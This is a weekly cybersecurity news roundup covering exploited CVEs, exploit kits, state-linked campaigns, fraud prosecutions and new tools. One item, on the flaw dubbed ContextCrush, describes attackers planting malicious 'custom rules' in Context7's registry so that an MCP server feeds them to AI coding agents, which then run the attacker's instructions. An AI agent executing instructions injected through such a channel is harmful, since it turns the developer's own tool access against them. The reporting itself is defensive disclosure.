The vulnerabilities were identified over a two-week period in January 2026. The company noted that the cost of identifying vulnerabilities is cheaper than creating an exploit for them, and the model is better at finding issues than at exploiting them. Qualcomm Flaw Exploited in the Wild — A high-severity security flaw impacting Qualcomm chips used in Android devices has been exploited in the wild. The vulnerability in question is CVE-2026-21385 (CVSS score: 7.8), a buffer over-read in the Graphics component that could result in memory corruption and arbitrary code execution.

There are currently no details on how the vulnerability is being exploited in the wild. However, Google acknowledged in its monthly Android security bulletin that “there are indications that CVE-2026-21385 may be under limited, targeted exploitation.” Coruna iOS Exploit Kit Uses 23 Exploits Against Older iOS Devices — Google disclosed details of a new and powerful exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, the company said. What makes it different is that it started with a commercial surveillance vendor in February 2025, got picked up by what seems like a Russian espionage group targeting Ukrainians in July 2025, and ended up in the hands of financially motivated attackers in China going after crypto wallets by the end of the year.

Coruna began its life as a surveillance exploit kit, but by the time it reached the Chinese cybercrime gang, it was heavily focused on financial theft. It’s not known how the exploit kit got passed between multiple threat actors of varied motivations. This has raised the possibility of a secondhand market where it’s resold to other threat actors, who end up repurposing them for their own objectives. Transparent Tribe Unleases Vibeware Against Indian Entities — In a new attack campaign detected by Bitdefender, the Pakistan-aligned threat actor known as Transparent Tribe has leveraged artificial intelligence (AI)-powered coding tools to vibe-code malware and use them to target the Indian government and its embassies in multiple foreign countries.

These tools are written in niche programming languages like Nim, Zig, and Crystal so as to evade detection. “Rather than a breakthrough in technical sophistication, we are seeing a transition toward AI-assisted malware industrialization that allows the actor to flood target environments with disposable, polyglot binaries,” the company said. Iranian Hackers Target U.S. Entities Amid Conflict — The Iranian hacking group tracked as MuddyWater (aka Seedworm) targeted several U.S.

companies, including banks, airports, non-profit, and the Israeli arm of a software company, as part of a campaign that began in early February 2026, and continued after the joint U.S.-Israel military strikes on Iran towards the end of the month. The development comes against the backdrop of hacktivist-fueled cyber attacks, with wiper campaigns targeting Israeli energy, financial, government, and utilities sectors. “The trajectory is clear: what began as nation-state-level ICS capability in 2012 [with Shamoon wiper] has become, by 2026, something any motivated actor can attempt with free tools and an internet connection,” CloudSEK said in a report last week. “The technical barrier has collapsed.

The threat pool has expanded. And the US attack surface has never been larger.” Another targeted campaign has distributed a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications. Once installed, the malware monitors and abuses the granted permissions to collect sensitive data, including SMS messages, contacts, location data, device accounts, and installed applications. The campaign is believed to be the work of a Hamas-affiliated actor known as Arid Viper .

There are currently no details available on the scope of the campaign and whether any of the infections were successful. Acronis said it highlights how trusted emergency services can be weaponized during periods of geopolitical tension using social engineering. ‎️‍🔥 Trending CVEs New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community.

Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-2796 (Mozilla Firefox), CVE-2026-21385 (Qualcomm), CVE-2026-2256 ( MS-Agent ), CVE-2026-26198 (Ormar), CVE-2026-27966 (langflow), CVE-2025–64712 (Unstructured.io), CVE-2026-24009 (Docling), CVE-2026-23600 (HPE AutoPass License Server), CVE-2026-27636 , CVE-2026-28289 (aka Mail2Shell) (FreeScout), CVE-2025-67736 ( FreePBX ), CVE-2025-34288 (Nagios XI), CVE-2025-14500 ( IceWarp ), CVE-2026-20079 (Cisco Secure Firewall Management Center), CVE-2025-13476 (Viber app for Android), CVE-2026-3336, CVE-2026-3337, CVE-2026-3338 (Amazon AWS-LC), CVE-2026-25611 (MongoDB), CVE-2026-3536, CVE-2026-3537, CVE-2026-3538 (Google Chrome), CVE-2026-27970 (Angular), CVE-2026-29058 (AVideo) a privilege escalation flaw in IPVanish VPN for macOS (no CVE), and and a remote code execution vulnerability in Ghost CMS (no CVE). 🎥 Cybersecurity Webinars Automating Real-World Security Testing to Prove What Actually Works → Running a security test once a year and hoping for the best? That’s not a strategy anymore. This webinar shows you how to continuously test your defenses using real attack techniques — so you actually know what holds up and what quietly breaks when no one’s looking.

When AI Agents Become Your New Attack Surface → AI tools aren’t just answering questions anymore — they’re browsing the web, hitting APIs, and touching your internal systems. That changes everything about how you think about risk. This webinar breaks down what that means for security, and what you actually need to do before something goes wrong. 📰 Around the Cyber World New AirSnitch Attack Shows Wi-Fi Client Isolation May Not Be Enough — A group of academics has developed a new attack called AirSnitch that breaks the encryption that separates Wi-Fi clients.

Xin’an Zhou, the lead author of the research paper, told Ars Technica that AirSnitch bypasses worldwide Wi-Fi encryption and that it “might have the potential to enable advanced cyber attacks.” The attack , at its core, leverages three weaknesses in client isolation implementations: (1) It abuses the group key(s) that are shared between all clients in the same Wi-Fi network, (2) It bypasses client isolation by tricking the gateway into forwarding packets to the victim at the IP layer by taking advantage of the fact that many networks only enforce client isolation at the MAC/Ethernet layer, and (3) It allows an adversary to manipulate internal switches and bridges to forward the victim’s uplink and downlink traffic to the adversary. As a result, they enable the attacker to restore AitM capabilities even if client isolation protections exist. “We found that Wi-Fi client isolation can often be bypassed,” Mathy Vanhoef said. “This allows an attacker who can connect to a network, either as a malicious insider or by connecting to a co-located open network, to attack others.” Google Tracked 90 Exploited 0-Days in 2025 — Google said it tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025, up from 78 in 2024 and down from 100 in 2023.

“Both the raw number (43) and proportion (48%) of vulnerabilities impacting enterprise technologies reached all-time highs, accounting for almost 50% of total zero-days exploited in 2025,” the company said . Of these, vulnerabilities in security and networking appliances made up about half (21) of the enterprise-related zero-days in 2025. Mobile zero-days rebounded from nine in 2024 to 15 in 2025, with commercial surveillance vendors (15, plus likely another three) leading the charge in exploiting zero-day vulnerabilities than state-sponsored cyber espionage groups (12) for the first time. The names of the commercial spyware companies were not disclosed.

Microsoft had the largest number of actively exploited flaws at 25, followed by Google (11), Apple (8), Cisco (4), Fortinet (4), Ivanti (3), and Broadcom VMware (3). Memory safety issues accounted for 35% of all exploited zero-day vulnerabilities last year. Financially motivated threat groups, including ransomware gangs, also targeted enterprise technologies and accounted for nine zero-days in 2025, double the five attributed to them in 2024. Velvet Tempest Deploys ClickFix Attack — Velvet Tempest (aka DEV-0504) has been observed using a ClickFix lure, followed by hands-on-keyboard activity consistent with Termite ransomware tradecraft.

According to a report by Deception.Pro, the attack used the social engineering technique to drop payloads like DonutLoader and CastleRAT. “Follow-on activity included Active Directory reconnaissance (domain trusts, server discovery, user listing) and attempted browser credential harvesting via a PowerShell script downloaded from 143.198.160[.]37,” it said . “Telemetry and infrastructure in this chain align with a modern initial-access playbook: rapid staging, heavy use of living-off-the-land binaries (LOLBins), and long-lived command-and-control (C2) traffic that blends into normal browser noise.” No ransomware was deployed in the attack that took place between February 3 and 16, 2026. Ghanaian National Pleads Guilty to Role in $100M Romance Scam — A Ghanaian national pleaded guilty to his role in a massive fraud ring that stole over $100 million from victims across the U.S.

through business email compromise attacks and romance scams. 40-year-old Derrick Van Yeboah pleaded guilty to conspiracy to commit wire fraud and agreed to pay more than $10 million in restitution. “Van Yeboah personally perpetrated many of the romance scams by impersonating fake romantic partners in communications with victims,” the U.S. Justice Department said .

“Many of the conspiracy’s victims were vulnerable older men and women who were tricked into believing that they were in online romantic relationships with persons who were, in fact, fake identities assumed by members of the conspiracy.” The conspirators, part of a criminal organization primarily based in Ghana, also committed business email compromises to deceive businesses into wiring funds to the enterprise. In total, the scheme stole and laundered more than $100 million from dozens of victims. After stealing the money, the fraud proceeds were laundered to West Africa. The defendant is scheduled to be sentenced in June 2026.

Taiwan Indicts 62 People for Cyber Scams — Prosecutors in Taipei indicted 62 people and 13 companies for their involvement in cyber scam operations organized throughout Asia by the Prince Group . Chen Zhi, the founder of the Prince Group, was indicted by U.S. prosecutors last year on money laundering charges. Taipei prosecutors said those associated with Prince Group laundered at least $339 million into Taiwan and used the stolen funds to buy 24 properties, 35 vehicles, and other assets amounting to approximately $1.7 million.

In all, authorities seized about $174 million in cash and assets. Prince Group “effectively controlled 250 offshore companies in 18 countries, holding 453 domestic and international financial accounts. By creating fictitious transaction contracts between these offshore companies, the group laundered money through foreign exchange channels,” they added. Ransomware Actors Use AzCopy — Ransomware operators are ditching the usual tools like Rclone for Microsoft’s own AzCopy , turning a trusted Azure utility into a stealthy data exfiltration mechanism and blending into normal activity.

“The adoption of AzCopy and other familiar tools by attackers represents a similar logic to living-off-the-land in the final and most critical phase of an operation: exfiltrating data out of an organization,” Varonis said . “Spinning up an Azure storage account takes minutes and requires only a credit card or compromised credentials. The attacker gains the benefits of Microsoft’s global infrastructure while security teams struggle to distinguish between malicious uploads and legitimate traffic.” Threat Actors Exploit Critical Flaw in WPEverest Plugin — Threat actors are exploiting a critical security flaw in WPEverest’s User Registration & Membership plugin (CVE-2026-1492, CVSS score: 9.8) to create rogue administrator accounts. The vulnerability affects all versions of User Registration & Membership through 5.1.2.

The issue has been addressed in version 5.1.3. Wordfence said the plugin is susceptible to improper privilege management, which enables the creation of bogus admin accounts. “This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist,” it said . “This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration.” MuddyWater Evolves Its Tactics — The Iranian hacking group known as MuddyWater has been observed leveraging Shodan and Nuclei to identify potential vulnerable targets, as well as using subfinder and ffuf to perform enumeration of target web applications.

The findings come from an analysis of the threat actor ‘s VPS server hosted in the Netherlands. MuddyWater is also said to be attempting to scan and/or exploit recently disclosed CVEs related to BeyondTrust (CVE-2026-1731), Ivanti (CVE-2026-1281), n8n (CVE-2025-68613), React (CVE-2025-55182), SmarterMail (CVE-2025-52691), Laravel Livewire (CVE-2025-54068), N-Central (CVE-2025-9316), Citrix NetScaler (CVE-2025-5777), Langflow (CVE-2025-34291), and Fortinet (CVE-2024-55591, CVE-2024-23113, CVE-2022-42475), along with SQL injection vulnerabilities in BaSalam and an unspecified Postgres development platform for initial access. One of the custom tools identified in the server is KeyC2, a command-and-control (C2) framework that allows operators to remotely control compromised Windows machines over a custom binary protocol on port 1269 from a Python script. Two C2 tools used by the adversary are PersianC2, which relies on standard HTTP polling to receive commands and files via JSON API endpoints, and ArenaC2, a Python-based program that operates over HTTP POST requests.

Also detected is a PowerShell loader that leads to the execution of obfuscated Node.js payloads that appear similar to Tsundere Botnet. The infrastructure is assessed to have been used to target entities in Israel, Egypt, Jordan, the U.A.E., and the U.S. Some aspects of the activity overlap with Operation Olalampo . 2,622 Valid Certificates Exposed — A new study undertaken by Google and GitGuardian found over a million unique private keys leaked across GitHub and Docker Hub, out of which 40,000 were mapped to 140,000 real TLS certificates.

“As of September 2025, 2,600 of these certificates were valid, with more than 900 actively protecting Fortune 500 companies, healthcare providers, and government agencies,” GitGuardian said . “Our disclosure campaign achieved 97% remediation, but at the cost of 4,300 emails sent, 1,706 entities contacted, 9 bug bounty submissions, countless follow-ups, and days of meticulous attribution work employing multiple OSINT techniques. The high success rate masks the extraordinary effort required to protect organizations that fail to protect themselves.” Context7 MCP Server Suffers from ContextCrush — A critical security flaw in Upstash’s Context7 MCP Server, a widely used tool for delivering documentation to AI coding assistants, has been discovered. Dubbed ContextCrush, the vulnerability could allow attackers to inject malicious instructions into AI development tools through a trusted documentation channel.

Noma Security, which disclosed details of the flaw, said it’s rooted within the platform’s “Custom Rules” feature, which allows library maintainers to provide AI-specific instructions to help assistants better interpret documentation. “Context7 operates both as the registry, where anyone can publish and manage library documentation, and as the trusted delivery mechanism that pushes content directly into the AI agent’s context,” security researcher Eli Ainhorn said . “The attacker never needs to reach the victim’s machine. Instead, the attacker can plant malicious custom rules in Context7’s registry, and Context7’s infrastructure delivers them through the MCP server to the AI agent running in the developer’s IDE.

As agents are execution machines and run whatever is loaded into their context, all the victim’s agent does is execute the attacker’s instructions on the victim’s machine, using its own tool access (Bash, file read/write, network). In this scenario, the agent has no way to distinguish between legitimate documentation and attacker-controlled content because they arrive through the same trusted channel and from the same trusted source.” German Court Sentences Key Person Behind Call Center Scam — A German court has sentenced a suspected central figure in the so-called Milton Group call-center fraud network to seven-and-a-half years in prison. Although the court did not publicly name the defendant, court records reviewed by the Organized Crime and Corruption Reporting Project (OCCRP) indicate the person convicted was Mikheil Biniashvili, a citizen of Georgia and Israel. In addition to the prison sentence, the court ordered the confiscation of €2.4 million ($2.8 million) linked to the operation.

Between 2017 and 2019, the defendant ran a call-center operation in Albania that used trained agents to persuade victims to invest in fraudulent online trading schemes. The scheme caused losses of about €8 million ($9.4 million) to victims, mostly in German-speaking countries. The operation employed up to 600 people at its peak. Call-center agents allegedly posed as investment advisers, building trust with targets before persuading them to deposit funds into fake trading platforms controlled by the network by promising large investment returns.

Biniashvili was arrested in Armenia in 2023 and extradited to Germany in 2024. Multiple Flaws in Avira Internet Security — Three vulnerabilities have been disclosed in Avira Internet Security that could allow for arbitrary file deletion (CVE-2026-27748) in the Software Updater component, an insecure deserialization (CVE-2026-27749) in System Speedup, and an arbitrary folder deletion over TOCTOU (CVE-2026-27748) in the Optimizer. “The file delete primitive is useful on its own,” Quarkslab said . “The other two both result in Local Privilege Escalation to SYSTEM.” Russian Ransomware Operator Pleads Guilty in U.S.

— Evgenii Ptitsyn, a 43-year-old Russian national, has pleaded guilty in a U.S. court to running the Phobos ransomware outfit that targeted more than 1,000 victims globally and extorted ransom payments worth over $39 million. Ptitsyn was extradited from South Korea in November 2024. “Beginning in at least November 2020, Ptitsyn and others conspired to engage in an international computer hacking and extortion scheme that victimized public and private entities through the deployment of Phobos ransomware,” the Justice Department said.

“As part of the scheme, Ptitsyn and his co-conspirators developed and offered access to Phobos ransomware to other criminals or ‘affiliates’ to encrypt victims’ data and extort ransom payments from victims. The administrators operated a darknet website to coordinate the sale and distribution of Phobos ransomware to co-conspirators and used online monikers to advertise their services on criminal forums and messaging platforms.” Ptitsyn faces a maximum penalty of 20 years in prison for wire fraud charges. Fake Google Security Check Leads to RAT — A bogus website resembling the Google Account security page is being used to deliver a Progressive Web App (PWA) capable of harvesting one-time passcodes and cryptocurrency wallet addresses, and proxying attacker traffic through victims’ browsers. “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents – all without installing a traditional app,” Malwarebytes said .

“For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.” Phishing Campaign Abuses Google Infrastructure — A new email phishing campaign is leveraging legitimate Google infrastructure to bypass standard security filters. The activity uses Google Cloud Storage (GCS) to host initial phishing URLs that, when clicked, redirect unsuspecting users to a malicious site designed to capture their financial information or deploy malware. “By hosting the initial link on Google’s servers, the attackers ensure the email passes authentication checks like SPF and DKIM,” security researcher Anurag Gawande said . Client-Side Injection Conducts Ad Fraud — A new malicious client-side injection originating from a malicious browser extension impersonating Microsoft Clarity has been found to overwrite referral tokens to redirect affiliate revenue to unknown threat actors.

“A browser extension is injecting obfuscated JavaScript from msclairty[.]com, a typosquatted domain impersonating Microsoft Clarity,” c/side’s Simon Wijckmans said . “The domain is not serving analytics. It is delivering an obfuscated JavaScript payload that performs affiliate cookie stuffing, tracking cookie deletion, and Fetch API hijacking inside the visitor’s browser. This prevents a competing tracking service from recording the real traffic source.

The attacker does not just want credit for the visit. They actively block other trackers from capturing any attribution data that would conflict with their fraudulent cookie.” The script has affected sites across multiple unrelated sectors, including transportation, SaaS platforms, sports management, and government payment portals. Impacted visitors primarily span Chrome versions 132, 138, and 145, and originate from U.S.-based IP addresses on the East and West coasts. Illinois Man Charged with Hacking Snapchat Accounts to Steal Nudes — U.S.

prosecutors have charged a 26-year-old Illinois man, Kyle Svara, with conducting a phishing operation that made it possible to break into the Snapchat accounts of approximately 570 women to steal private photos and sell them online. “From at least May 2020 to February 2021, Svara used social engineering and other resources to collect his targets’ emails, phone numbers, and/or Snapchat usernames,” the Justice Department said . “He then used those means of identification to access his targets’ Snapchat accounts, which prompted Snap Inc. to send account security codes to those women.

Using anonymized phone numbers, Svara posed as a representative of Snap Inc. and sent more than 4,500 text messages to hundreds of women, requesting those Snapchat access codes.” Svara is alleged to have accessed the Snapchat accounts of at least 59 women without permission to download their nude or semi-nude images and sell them on internet forums. Meta Sued Over AI Smart Glasses’ Privacy Concerns — Meta is facing a new class action lawsuit over its AI-powered Ray-Ban Meta glasses, following a report from Swedish newspapers Svenska Dagbladet and Goteborgs-Posten that employees at Kenya-based subcontractor Sama are reviewing intimate, personal footage filmed from customers’ glasses. Meta said subcontracted workers might sometimes review content captured by its AI smart glasses for the purpose of improving the “experience,” as stated in its Privacy Policy .

It also claimed that data is filtered to protect people’s privacy. But the investigation found that this step did not always consistently work. “Unless users choose to share media they’ve captured with Meta or others, that media stays on the user’s device,” Meta told BBC News. “When people share content with Meta AI, we sometimes use contractors to review this data for the purpose of improving people’s experience, as many other companies do.” Total Ransomware Payments Stagnated in 2025 — The total ransomware payments in 2025 stagnated, even if the number of attacks increased.

According to blockchain analysis firm Chainalysis, total on-chain ransomware payments fell by approximately 8% to $820 million in 2025, even as claimed attacks rose 50%. “While aggregate revenue stagnated, the median ransom payment grew 368% year-over-year to nearly $60,000,” the company said . “The 2025 total is likely to approach or exceed $900 million as we attribute more events and payments, just as our 2024 total grew from our initial $813 million estimate this time last year.” The decline in payment rates from 63% in 2024 to just 29% last year indicates that fewer victims are yielding to attackers’ ransom demands, it added. The development comes amid increased fragmentation of the ransomware ecosystem and threat actors shifting towards more stealthy methods, such as defense evasion and persistence techniques, to prioritize data theft and prolonged, low-noise access.

Mobile Blockchain Wallet Found Vulnerable to Severe Flaws — An unnamed mobile blockchain wallet app for Android has been found susceptible to two independent severe vulnerabilities, allowing untrusted deep links to trigger sensitive wallet flows and trick users into approving phishing-driven transactions, as well as retain cryptographic private keys from the device despite deleting an account. This meant that an attacker with later device access could re-import the account using its public address and regain full signing authority without re-entering the keys. According to LucidBit Labs, the vulnerabilities have been patched by the developer. “The main strength of crypto wallets lies in their cryptographic foundations,” security researcher Assaf Morag said.

“However, when these wallets are implemented as user-facing applications, the overall orchestration of the system becomes just as critical as the cryptography itself. As the saying goes, a system’s security posture is defined by its weakest link. In this case, the two vulnerabilities demonstrate how flaws at the application layer can undermine the entire security model, despite the strength of the underlying cryptography.” Kubernetes RCE Via Nodes/Proxy GET Permission — New research has identified an authorization bypass in Kubernetes Role-based access control (RBAC) that allows a service account with nodes/proxy GET permissions to execute commands in any Pod in the cluster. The issue exploits a bug in how Kubernetes API servers handle WebSocket connections.

“Nodes/proxy GET allows command execution when using a connection protocol such as WebSockets,” security researcher Graham Helton said . “This is due to the Kubelet making authorization decisions based on the initial WebSocket handshake’s request without verifying CREATE permissions are present for the Kubelet’s /exec endpoint, requiring different permissions depending solely on the connection protocol. The result is anyone with access to a service account assigned nodes/proxy GET that can reach a Node’s Kubelet on port 10250 can send information to the /exec endpoint, executing commands in any Pod, including privileged system Pods, potentially leading to a full cluster compromise.” The Kubernetes project has declined to address the issue, stating its intended behavior. However, it’s expected to release Fine-Grained Kubelet API Authorization (KEP-2862) next month to address the attack.

“A targeted patch would require coordinated changes across multiple components with special-case logic,” Edera said . “This is the kind of complexity that could lead to future vulnerabilities. Once KEP-2862 reaches GA and sees adoption, nodes/proxy can be deprecated for monitoring use cases.” Other Key Stories on the Radar — The Israeli government is working on the country’s first cybersecurity law, the U.S. National Security Agency (NSA) published Zero Trust Implementation Guidelines (ZIGs) to help organizations safeguard sensitive data, systems, and services against sophisticated cyber threats, Google Project Zero found multiple vulnerabilities that could be used to bypass a new Windows 11 feature called Administrator Protection and obtain admin privileges, threat actors are continuing to abuse Microsoft Teams functionality by leveraging guest invitations and phishing-themed team names to impersonate billing and subscription notifications, and a loader named PhantomVAI has been used in the wild over the past year to deploy other payloads, such as Remcos RAT, XWorm, AsyncRAT, DarkCloud, and SmokeLoader.

🔧 Cybersecurity Tools DetectFlow → It is an open-source detection pipeline from SOC Prime that matches streaming log events against Sigma rules in real time — before they ever reach your SIEM. Instead of relying on your SIEM to do the heavy lifting, it tags and enriches events in-flight using Apache Kafka and Flink, then passes the results downstream to wherever you need them. Built on 11 years of detection intelligence, it’s designed for teams who want faster detection, more rule coverage, and less dependency on SIEM-imposed limits. ADTrapper → It is an open-source platform that analyzes Windows Active Directory authentication logs and flags threats using 54+ built-in detection rules — covering everything from brute force to AD CS attacks.

It runs in Docker, deploys with one command, and supports SharpHound data for deeper AD analysis. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.

Conclusion That’s your week. A lot happened. Some of it was bad, some of it was worse, and a little bit of it was actually good. The scoreboard is messy, like it always is.

Same time next week — and if history is any guide, we’ll have plenty more to talk about. Stay patched, stay skeptical, and maybe don’t click that link. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.